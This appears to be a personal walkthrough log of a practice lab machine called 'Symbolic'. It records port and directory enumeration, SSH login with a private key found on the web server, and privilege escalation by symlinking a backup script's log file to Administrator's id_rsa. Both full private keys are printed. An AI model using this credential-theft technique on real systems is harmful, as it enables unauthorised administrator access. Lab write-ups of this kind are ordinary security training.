Symbolic

๐Ÿงช Pentest Log: {{date:2025-08-22}}

๐Ÿ” Target Information

ip=192.168.106.177

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Found /pdfs directory, obtain id_rsa key content

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcnNhAAAAAwEAAQAAAQEAwJ/CrZ22UkzcIbT8M/k5A8TgrTDB3EB3B24CfEwtva4YFfuerl/AWv6jX+B07dzTXpg43JjQ4XRJ3X9HpamXjHchwUy+hpqmMtBlZ+u7vsCdTYl9DxLdnJkhx0gLjDF96NDilVDZFgnxYq14lHxzqi0OkjwwspfbJWCoE4iklyg/maQa9/h0sON8rb7WTZGlNKK1IZ5a+rcJurqnz6pGhsRjzY6RDneMPbas1b8Bigld/IFZhw0axQ9hz57pPFOsbwJafBLZXd33xKW3qau7BuB02pS9mgGX7ZtJhiTPjL1F3knLGRVN0ip2eB35a2/xs4cB8d8OufYC7sVgEF6YpwAAA8i1CB5PtQgeTwAAAAdzc2gtcnNhAAABAQDAn8KtnbZSTNwhtPwz+TkDxOCtMMHcQHcHbgJ8TC29rhgV+56uX8Ba/qNf4HTt3NNemDjcmNDhdEndf0elqZeMdyHBTL6GmqYy0GVn67u+wJ1NiX0PEt2cmSHHSAuMMX3o0OKVUNkWCfFirXiUfHOqLQ6SPDCyl9slYKgTiKSXKD+ZpBr3+HSw43ytvtZNkaU0orUhnlr6twm6uqfPqkaGxGPNjpEOd4w9tqzVvwGKCV38gVmHDRrFD2HPnuk8U6xvAlp8Etld3ffEpbepq7sG4HTalL2aAZftm0mGJM+MvUXeScsZFU3SKnZ4Hflrb/GzhwHx3w659gLuxWAQXpinAAAAAwEAAQAAAQA4bdT7RYuG2qtWWI3Vr/oK558mPXVdT6lPDOQ/g5WWzqyRrA/VZ4mTXqt/x+KZWCq3uIJX5ZCzq3yEHehgWKlj5faGiTP7fMyZcEF0yzNJ82VhtJhlVRKE8LtbhPiVDl6jWKY4NeISucD0NntvjHHZ9a8iGe3uM9xoO8OhTVNiUE4g8UhYJC0QldY+BwpaqCZjHprXgIOCOFH3Y1NkIyy9kYv39nALQQel0sgh+Hxr1DlQ+eAaWmvk1Bh9fNR3GgCvguQZGCEejsze0r7Ud9PETCmbc/gzKSqZYMGBJRpyBgbGsu3WgxrWsTy1pCIlDELR+X2vrsXHt8B5JoDQNUzBAAAAgFrngsFpFUT8hdjmW3p4wgChf2+6Q66pSe1eFiEOcrd2wegtSl3xK9/1un8DyIqA8nc6xCBqRmD9YLVqAXkqFd0qCC/dLa6MhWFBmmqO5BvKUiNfxrS6RgMvnRfNqtm6HjWGfzQGvl6sTitxrQWsf+dhME3dbX04P+XJ9eUyT4yOAAAAgQD6LCB8Cdh6usotxOmsesgBcIJIquv/2iNlAuCHEU2bM8E557XheVtUVZiLEE04cGOgegep3/nk51h1YNdgBVzeVvpA5l3DW9DuVGp0XYfO/2bKcDNP90CxFP7yMRci8fY4q1rOvE3aVwbzM+DThY+O8fBYCaAgYg3gux8/lSll4QAAAIEAxRxze5pJdLDesbP/3f8u6TuZgrCnrN5PE87PMmsYxiR1naTMMRmYnOMjbRXM57KUgsHc3RQghx7MTp3iYMYExMQ7oLmxYFKdvtAYTkFRUjucvEZiZJfytSEu3s6qPAl70tpYn8dD8jyq9Fc6hirO2nB1zMKSMiPv3WLaCWdnv4cAAAAQcDR5bDBhZEBTWU1CT0xJQwECAw==
-----END OPENSSH PRIVATE KEY-----

๐Ÿ’ฃ Exploitation / Foothold

Tool / Script Used:

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

ssh -i id_rsa p4yl0ad@$ip

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

PrivescCheck:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Found

Name        : BackupLogService                                                   DisplayName : BackupLogService                                                   
ImagePath   : C:\Program Files\nssm-2.24\win64\nssm.exe                          User        : .\Administrator                                                    StartMode   : Automatic

Found Backup folder under C:\, view the backup.ps1 file

$log = "C:\xampp\htdocs\logs\request.log" 
$backup = "C:\backup\logs"

while($true) {
        # Grabbing Backup
        copy $log $backup\$(get-date -f MM-dd-yyyy_HH_mm_s)
        Start-Sleep -s 60
}

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

del C:\xampp\htdocs\logs\request.log

CreateSymlink.exe "C:\xampp\htdocs\logs\request.log" "C:\Users\Adminis
trator\.ssh\id_rsa"

type 08-22-2025_20_01_47

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAxxA5qirPy3e1f5k4mL/3P1zBuVAgVPk4AZhptq1oyUsnNC4y0E3e
AVQvcLFty21pVg8Dd4MBhE1SQqrCGN1pIoWcIPGRlvbDOmGaXFk3ow5IYcu5nkw0L6u2ML
EO3SomD4bP1Z112FBbYA8KAymItR39M2QPKYXAHF1wNxZlWQjhVEmhKZVCLYubgECimTje
43EZ6NxELnftirOUhTFAecXIqo9FPyUpXh3ltMqR3mupeBLp7cblubMa5sV1P9v4xjxJRj
WaL0aAb4OjS67bKG2HEoWWY7JHrjUKCzOpQpHvz7u00MroNa31SHu6XDBraREzZeZ+zdse
fFcZdflKRwAAA9CAteVYgLXlWAAAAAdzc2gtcnNhAAABAQDHEDmqKs/Ld7V/mTiYv/c/XM
G5UCBU+TgBmGm2rWjJSyc0LjLQTd4BVC9wsW3LbWlWDwN3gwGETVJCqsIY3WkihZwg8ZGW
9sM6YZpcWTejDkhhy7meTDQvq7YwsQ7dKiYPhs/VnXXYUFtgDwoDKYi1Hf0zZA8phcAcXX
A3FmVZCOFUSaEplUIti5uAQKKZON7jcRno3EQud+2Ks5SFMUB5xciqj0U/JSleHeW0ypHe
a6l4EuntxuW5sxrmxXU/2/jGPElGNZovRoBvg6NLrtsobYcShZZjskeuNQoLM6lCke/Pu7
TQyug1rfVIe7pcMGtpETNl5n7N2x58Vxl1+UpHAAAAAwEAAQAAAQBXP/hWap9baiPGQq04
3mMLhadvhvw04ms238vuAsG8ANG1IE6rWIXnBTQp68rY8CLMUpZNasFecNmOWPPsHBe5xu
Aw3FDY312gmCklMwGc2WTGYJoCFRqGjnezjdea/p9iDM/JrFN7tXTnfJAB5NGDuRpCzSeM
JpCWninSK2HOjLygldNiJCjmFhl5YJ2IU1GjSMDtNUo3VavCcrQ+FxB+L2eG7FHiHo3+Be
McSGCOLBf1YokbXV88Se9ofnJyi+Ddsg9+v4vQfSZ958m/gSAoqxkg0KtWR45lpMpSN03k
Hx8mb3jQTJhuT07GRXiZIJ5RVmO0f6wNH6KzACnD7J9ZAAAAgQCvUJUJwYSUvI0rNSXQMz
tieT0IZq7oFiQISKjfAED0zLWm3s9ML8BZ3ArWomZinsHont1Pr1Q0nXhLB/UEqECMpkDf
Rnr+MssfPXMh/BHmsIcAzqT0MoG1NIeF3dRWQbo4ZmxDZQ3YJhfrstVzmho9qZWx2ZXyPs
sA7HCDqBV1CQAAAIEA754ugprmrQCFcR2DqV52ejK1MARGxYlNq980hUplnlV1oE2hrbzs
AJ2dDHXRnllAAWJDQtJvYlj3w9C7p4bXKnczXXAKwa0MCtyz1h0TGyn63k8L0+BxKXnOET
NDHrBJ06pBdJpf5TCX0Uz4siCTOibDVol2gZbQkFkDLtV/y/MAAACBANSsQQgd8rBIxsBB
lZnID93TvwWniL8i7v/IHiuALGMGLqaXTb8FYPNhlOZPQmpE3SzstosCAmf+dypTYa1qm3
PK16UBRBIkltnlfuRDBKqLWtI5MoPhArWelEyd/xpLAvMcMcsS8bh2TJe8jfo1dC8TcCNm
va4M+FKZegkfjsFdAAAAFmFkbWluaXN0cmF0b3JAU1lNQk9MSUMBAgME
-----END OPENSSH PRIVATE KEY-----

ss -i id_rsa_admin administrator@$ip